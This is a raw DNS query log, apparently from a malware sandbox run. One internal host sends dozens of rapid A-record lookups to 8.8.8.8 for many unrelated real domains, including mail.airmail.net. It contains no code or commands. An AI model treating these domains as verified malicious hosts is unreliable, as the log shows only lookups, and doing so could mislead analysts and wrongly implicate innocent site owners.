Mar 22, 2023 05:45:39.195533037 CET	192.168.2.5	8.8.8.8	0xd8b5	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.265249968 CET	192.168.2.5	8.8.8.8	0xfc30	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.321346045 CET	192.168.2.5	8.8.8.8	0xcc5a	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.321433067 CET	192.168.2.5	8.8.8.8	0x6ac7	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.343789101 CET	192.168.2.5	8.8.8.8	0x9746	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.383558035 CET	192.168.2.5	8.8.8.8	0xde2f	Standard query (0)	ossir.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.459018946 CET	192.168.2.5	8.8.8.8	0x483a	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.533582926 CET	192.168.2.5	8.8.8.8	0x3e63	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.577826977 CET	192.168.2.5	8.8.8.8	0x1164	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.754559040 CET	192.168.2.5	8.8.8.8	0x74fc	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.802130938 CET	192.168.2.5	8.8.8.8	0x77a4	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.859031916 CET	192.168.2.5	8.8.8.8	0x78d3	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.898464918 CET	192.168.2.5	8.8.8.8	0x7898	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.909842968 CET	192.168.2.5	8.8.8.8	0x28fd	Standard query (0)	nrsi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.954722881 CET	192.168.2.5	8.8.8.8	0x201a	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:39.976267099 CET	192.168.2.5	8.8.8.8	0xc009	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.001672983 CET	192.168.2.5	8.8.8.8	0xe8d5	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.018991947 CET	192.168.2.5	8.8.8.8	0x1c59	Standard query (0)	uhsa.edu.ag	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.018991947 CET	192.168.2.5	8.8.8.8	0xd7ed	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.038314104 CET	192.168.2.5	8.8.8.8	0x2755	Standard query (0)	midap.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.081065893 CET	192.168.2.5	8.8.8.8	0x6549	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.106431007 CET	192.168.2.5	8.8.8.8	0xac56	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.188472033 CET	192.168.2.5	8.8.8.8	0x9470	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.230142117 CET	192.168.2.5	8.8.8.8	0xa27	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.254132986 CET	192.168.2.5	8.8.8.8	0x8c5	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.284240961 CET	192.168.2.5	8.8.8.8	0xdeeb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.286746025 CET	192.168.2.5	8.8.8.8	0xd7f4	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.371217012 CET	192.168.2.5	8.8.8.8	0x2b83	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.380292892 CET	192.168.2.5	8.8.8.8	0xcc56	Standard query (0)	agulatex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.423031092 CET	192.168.2.5	8.8.8.8	0x62f4	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.587400913 CET	192.168.2.5	8.8.8.8	0x1cb0	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.696470976 CET	192.168.2.5	8.8.8.8	0x2a4d	Standard query (0)	a-domani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.705084085 CET	192.168.2.5	8.8.8.8	0x890	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.746933937 CET	192.168.2.5	8.8.8.8	0xa386	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.785970926 CET	192.168.2.5	8.8.8.8	0xd2f7	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.805078983 CET	192.168.2.5	8.8.8.8	0xf7eb	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.832216978 CET	192.168.2.5	8.8.8.8	0x79d3	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.928726912 CET	192.168.2.5	8.8.8.8	0x1b58	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.968657970 CET	192.168.2.5	8.8.8.8	0xc009	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:40.993376017 CET	192.168.2.5	8.8.8.8	0xd327	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.063486099 CET	192.168.2.5	8.8.8.8	0x3d9f	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.130558014 CET	192.168.2.5	8.8.8.8	0x4b66	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.159552097 CET	192.168.2.5	8.8.8.8	0x96b	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.193625927 CET	192.168.2.5	8.8.8.8	0x5fad	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.251280069 CET	192.168.2.5	8.8.8.8	0x1acc	Standard query (0)	amerifor.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.281043053 CET	192.168.2.5	8.8.8.8	0xdeeb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.344986916 CET	192.168.2.5	8.8.8.8	0x1691	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.374855995 CET	192.168.2.5	8.8.8.8	0x2b83	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.527863026 CET	192.168.2.5	8.8.8.8	0xa5de	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.578535080 CET	192.168.2.5	8.8.8.8	0x1cb0	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.660480022 CET	192.168.2.5	8.8.8.8	0x90b2	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.708883047 CET	192.168.2.5	8.8.8.8	0x1853	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:41.965378046 CET	192.168.2.5	8.8.8.8	0x413d	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.005398035 CET	192.168.2.5	8.8.8.8	0xfb4f	Standard query (0)	snf.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.281246901 CET	192.168.2.5	8.8.8.8	0xdeeb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.304172039 CET	192.168.2.5	8.8.8.8	0xbe55	Standard query (0)	gphpedit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.390697002 CET	192.168.2.5	8.8.8.8	0x2b83	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.460866928 CET	192.168.2.5	8.8.8.8	0xca03	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:42.593923092 CET	192.168.2.5	8.8.8.8	0x1cb0	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.051588058 CET	192.168.2.5	8.8.8.8	0xd051	Standard query (0)	yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.079871893 CET	192.168.2.5	8.8.8.8	0x5d47	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.208520889 CET	192.168.2.5	8.8.8.8	0x51a3	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.209017992 CET	192.168.2.5	8.8.8.8	0x524e	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.556323051 CET	192.168.2.5	8.8.8.8	0x7bdf	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.586148024 CET	192.168.2.5	8.8.8.8	0x2f95	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.772450924 CET	192.168.2.5	8.8.8.8	0xb9e6	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:43.845036030 CET	192.168.2.5	8.8.8.8	0xf1c5	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.297071934 CET	192.168.2.5	8.8.8.8	0xdeeb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.363234997 CET	192.168.2.5	8.8.8.8	0x5b36	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.390966892 CET	192.168.2.5	8.8.8.8	0x2b83	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.410331011 CET	192.168.2.5	8.8.8.8	0x53ce	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.609463930 CET	192.168.2.5	8.8.8.8	0x1cb0	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.696222067 CET	192.168.2.5	8.8.8.8	0xbae3	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.697376013 CET	192.168.2.5	8.8.8.8	0x42dd	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:44.788320065 CET	192.168.2.5	8.8.8.8	0xa6fa	Standard query (0)	hubbikes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.145216942 CET	192.168.2.5	8.8.8.8	0x645e	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.321762085 CET	192.168.2.5	8.8.8.8	0x58cf	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.398699999 CET	192.168.2.5	8.8.8.8	0x552	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.598289967 CET	192.168.2.5	8.8.8.8	0xaa8b	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.612915993 CET	192.168.2.5	8.8.8.8	0xc992	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.727041006 CET	192.168.2.5	8.8.8.8	0xe33	Standard query (0)	okashimo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:45.836169004 CET	192.168.2.5	8.8.8.8	0x6a37	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.314193964 CET	192.168.2.5	8.8.8.8	0x633f	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.328219891 CET	192.168.2.5	8.8.8.8	0x58cf	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.339703083 CET	192.168.2.5	8.8.8.8	0x9431	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.351413012 CET	192.168.2.5	8.8.8.8	0x6d79	Standard query (0)	alexpope.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.406486034 CET	192.168.2.5	8.8.8.8	0x552	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.609563112 CET	192.168.2.5	8.8.8.8	0xc992	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.614514112 CET	192.168.2.5	8.8.8.8	0x7d0e	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.691505909 CET	192.168.2.5	8.8.8.8	0x9802	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:46.710530043 CET	192.168.2.5	8.8.8.8	0xad05	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.258110046 CET	192.168.2.5	8.8.8.8	0x778c	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.346183062 CET	192.168.2.5	8.8.8.8	0x58cf	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.346218109 CET	192.168.2.5	8.8.8.8	0x9431	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.406775951 CET	192.168.2.5	8.8.8.8	0x552	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.552613974 CET	192.168.2.5	8.8.8.8	0x2e49	Standard query (0)	cutchie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.609504938 CET	192.168.2.5	8.8.8.8	0xc992	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.772205114 CET	192.168.2.5	8.8.8.8	0x4aab	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.803522110 CET	192.168.2.5	8.8.8.8	0xcd12	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.831197023 CET	192.168.2.5	8.8.8.8	0x1803	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:47.857497931 CET	192.168.2.5	8.8.8.8	0x58db	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.162734032 CET	192.168.2.5	8.8.8.8	0xa7c9	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.456101894 CET	192.168.2.5	8.8.8.8	0x5183	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.536072969 CET	192.168.2.5	8.8.8.8	0x5833	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.537137032 CET	192.168.2.5	8.8.8.8	0xec1c	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.709522009 CET	192.168.2.5	8.8.8.8	0x6fad	Standard query (0)	rkengg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:48.715737104 CET	192.168.2.5	8.8.8.8	0x973c	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.106370926 CET	192.168.2.5	8.8.8.8	0x4aaf	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.204612017 CET	192.168.2.5	8.8.8.8	0xb79d	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.362166882 CET	192.168.2.5	8.8.8.8	0x58cf	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.796456099 CET	192.168.2.5	8.8.8.8	0x552	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.797525883 CET	192.168.2.5	8.8.8.8	0xc992	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.800303936 CET	192.168.2.5	8.8.8.8	0xc04b	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.805927038 CET	192.168.2.5	8.8.8.8	0x3f15	Standard query (0)	thiessen.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.807739019 CET	192.168.2.5	8.8.8.8	0xd528	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:49.825839996 CET	192.168.2.5	8.8.8.8	0xb94e	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:50.072019100 CET	192.168.2.5	8.8.8.8	0x94ce	Standard query (0)	kavram.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.562205076 CET	192.168.2.5	8.8.8.8	0xc3c1	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.565257072 CET	192.168.2.5	8.8.8.8	0xf3bb	Standard query (0)	camamat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.570862055 CET	192.168.2.5	8.8.8.8	0x94c7	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.572266102 CET	192.168.2.5	8.8.8.8	0xa006	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.788058043 CET	192.168.2.5	8.8.8.8	0x4462	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.819220066 CET	192.168.2.5	8.8.8.8	0x7fa0	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.961026907 CET	192.168.2.5	8.8.8.8	0x132c	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:51.964447021 CET	192.168.2.5	8.8.8.8	0x24d0	Standard query (0)	t-mould.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.208024025 CET	192.168.2.5	8.8.8.8	0x379c	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.401523113 CET	192.168.2.5	8.8.8.8	0x288e	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.479140043 CET	192.168.2.5	8.8.8.8	0xc392	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.650747061 CET	192.168.2.5	8.8.8.8	0x8116	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.846498013 CET	192.168.2.5	8.8.8.8	0xcb2d	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:52.864171028 CET	192.168.2.5	8.8.8.8	0x5c49	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.257437944 CET	192.168.2.5	8.8.8.8	0x6ce1	Standard query (0)	gphpedit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.270397902 CET	192.168.2.5	8.8.8.8	0x5de8	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.349453926 CET	192.168.2.5	8.8.8.8	0x373e	Standard query (0)	reproar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:53.365104914 CET	192.168.2.5	8.8.8.8	0x6096	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.145716906 CET	192.168.2.5	8.8.8.8	0xa666	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.360136032 CET	192.168.2.5	8.8.8.8	0x6096	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.403054953 CET	192.168.2.5	8.8.8.8	0xed4	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.912265062 CET	192.168.2.5	8.8.8.8	0xa956	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.937700987 CET	192.168.2.5	8.8.8.8	0x49b4	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:54.965897083 CET	192.168.2.5	8.8.8.8	0xf98d	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.367935896 CET	192.168.2.5	8.8.8.8	0xfe12	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.368143082 CET	192.168.2.5	8.8.8.8	0x6b9c	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.368412018 CET	192.168.2.5	8.8.8.8	0x8a86	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.368776083 CET	192.168.2.5	8.8.8.8	0x6df9	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.369390965 CET	192.168.2.5	8.8.8.8	0x3919	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.369829893 CET	192.168.2.5	8.8.8.8	0x3d2a	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.386353016 CET	192.168.2.5	8.8.8.8	0x6096	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.388432026 CET	192.168.2.5	8.8.8.8	0x73d4	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.389936924 CET	192.168.2.5	8.8.8.8	0x3794	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.390840054 CET	192.168.2.5	8.8.8.8	0xb53d	Standard query (0)	pcoyuncu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.392813921 CET	192.168.2.5	8.8.8.8	0x64fd	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.393606901 CET	192.168.2.5	8.8.8.8	0x9071	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.393721104 CET	192.168.2.5	8.8.8.8	0xb4f6	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.394062042 CET	192.168.2.5	8.8.8.8	0xf199	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.394150972 CET	192.168.2.5	8.8.8.8	0x5035	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.420696974 CET	192.168.2.5	8.8.8.8	0xe023	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.427268028 CET	192.168.2.5	8.8.8.8	0xa6da	Standard query (0)	juso-gr.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.428119898 CET	192.168.2.5	8.8.8.8	0x8da	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.429697990 CET	192.168.2.5	8.8.8.8	0xf358	Standard query (0)	notis.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.430419922 CET	192.168.2.5	8.8.8.8	0x7084	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.434611082 CET	192.168.2.5	8.8.8.8	0x66cd	Standard query (0)	mondopp.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.435254097 CET	192.168.2.5	8.8.8.8	0x86d	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.438368082 CET	192.168.2.5	8.8.8.8	0xa76f	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.440344095 CET	192.168.2.5	8.8.8.8	0x31e2	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.442012072 CET	192.168.2.5	8.8.8.8	0x6828	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.455475092 CET	192.168.2.5	8.8.8.8	0x5466	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.472063065 CET	192.168.2.5	8.8.8.8	0x91ad	Standard query (0)	bigzz.by	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.475219011 CET	192.168.2.5	8.8.8.8	0xf2b2	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.476150036 CET	192.168.2.5	8.8.8.8	0x3a69	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.479916096 CET	192.168.2.5	8.8.8.8	0xbfc8	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.480940104 CET	192.168.2.5	8.8.8.8	0xaea9	Standard query (0)	s5w.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.481482983 CET	192.168.2.5	8.8.8.8	0x6e95	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.481684923 CET	192.168.2.5	8.8.8.8	0x265e	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.482233047 CET	192.168.2.5	8.8.8.8	0xdc19	Standard query (0)	angework.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.484014034 CET	192.168.2.5	8.8.8.8	0xb53c	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.485789061 CET	192.168.2.5	8.8.8.8	0x5182	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.488445997 CET	192.168.2.5	8.8.8.8	0xe408	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.489844084 CET	192.168.2.5	8.8.8.8	0xb475	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.491393089 CET	192.168.2.5	8.8.8.8	0x986d	Standard query (0)	hes.pt	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.497397900 CET	192.168.2.5	8.8.8.8	0xcffa	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.505826950 CET	192.168.2.5	8.8.8.8	0xd5b	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.507868052 CET	192.168.2.5	8.8.8.8	0x2942	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.507996082 CET	192.168.2.5	8.8.8.8	0xdc6	Standard query (0)	camamat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.508436918 CET	192.168.2.5	8.8.8.8	0xe5cb	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.508857012 CET	192.168.2.5	8.8.8.8	0xea72	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.508965015 CET	192.168.2.5	8.8.8.8	0x8de1	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.509493113 CET	192.168.2.5	8.8.8.8	0xa4e5	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.509773970 CET	192.168.2.5	8.8.8.8	0x2dff	Standard query (0)	karila.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.510242939 CET	192.168.2.5	8.8.8.8	0xe385	Standard query (0)	ruzee.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.520416021 CET	192.168.2.5	8.8.8.8	0xbde9	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.520792007 CET	192.168.2.5	8.8.8.8	0xd05e	Standard query (0)	dzm.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.524717093 CET	192.168.2.5	8.8.8.8	0xb763	Standard query (0)	ftmobile.com	A (IP address)	IN (0x0001)	false
